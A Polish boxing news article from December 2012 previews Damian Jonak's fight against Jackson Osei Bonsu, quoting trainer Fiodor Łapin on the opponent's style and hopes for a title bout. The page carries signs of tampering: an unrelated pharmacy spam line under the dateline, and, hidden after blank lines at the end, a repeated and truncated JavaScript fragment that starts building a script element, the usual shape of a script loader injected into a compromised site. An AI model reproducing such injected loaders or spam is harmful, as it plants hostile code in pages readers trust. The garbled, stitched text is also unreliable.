Fiodor Łapin pogania Jonaka

5.12.2012 / tta

cost of cialis without insurance

8 grudnia na gali „Wojak Boxing Night” w Katowicach notowany w czołówce światowych rankingów wagi junior średniej Damian Jonak z Trec Team (34-0-1, 21 KO) zmierzy się z mistrzem Unii Europejskiej Jacksonem Osei Bonsu (43-5, 29KO).

Ciemnoskóry Belg miał już okazję boksować w przeszłości w Polsce – we wrześniu 2008 roku uległ w Kielcach po zaciętej dwunastorundowej walce Rafałowi Jackiewiczowi (Trec Team), tracąc na jego rzecz tytuł mistrza Europy kategorii półśredniej.

– Bonsu od tamtej pory zmienił klasę wagowa i zmienił też styl boksowania, teraz walczy z zawodnikami silniejszymi fizycznie i nie ma już takiej przewagi siły, jak miał w kategorii półśredniej. Pamiętam, że gdyby nie dobra taktyka i bokserskie umiejętności Jackiewicza, Bonsu po prostu by go wtedy zmiótł z ringu. Bonsu nadal jest jednak bardzo niebezpieczny, zadaje dużo ciosów, trzeba się będzie pilnować do ostatniej rundy – ocenia trener Jonaka Fiodor Łapin, który w niedalekiej przyszłości widzi swojego podopiecznego w walce o mistrzostwo świata.

– Mieliśmy już nawet kilka propozycji i nawet jes przyjmowaliśmy, ale ostatecznie coś tam parę razy nie wypaliło – zdradza szkoleniowiec grupy KnockOut Promotions. – Jesteśmy jednak gotowi podjąć tę rękawice i mamy nadzieję na walkę o mistrzostwo w 2013 roku. Nie ma na co czekać…. Z zawodnikami średniego poziomu Damiana nie ma problemów, czas wskoczyć na ten poziom najwyższy i wtedy okaże się, czy może zostać mistrzem świata!

Źródło: ringpolska.pl, dostęp: 05.12.2012

 

 

 

 

 var d=document;var s=d.createElement(‚script’); var d=document;var s=d.createElement(‚script’);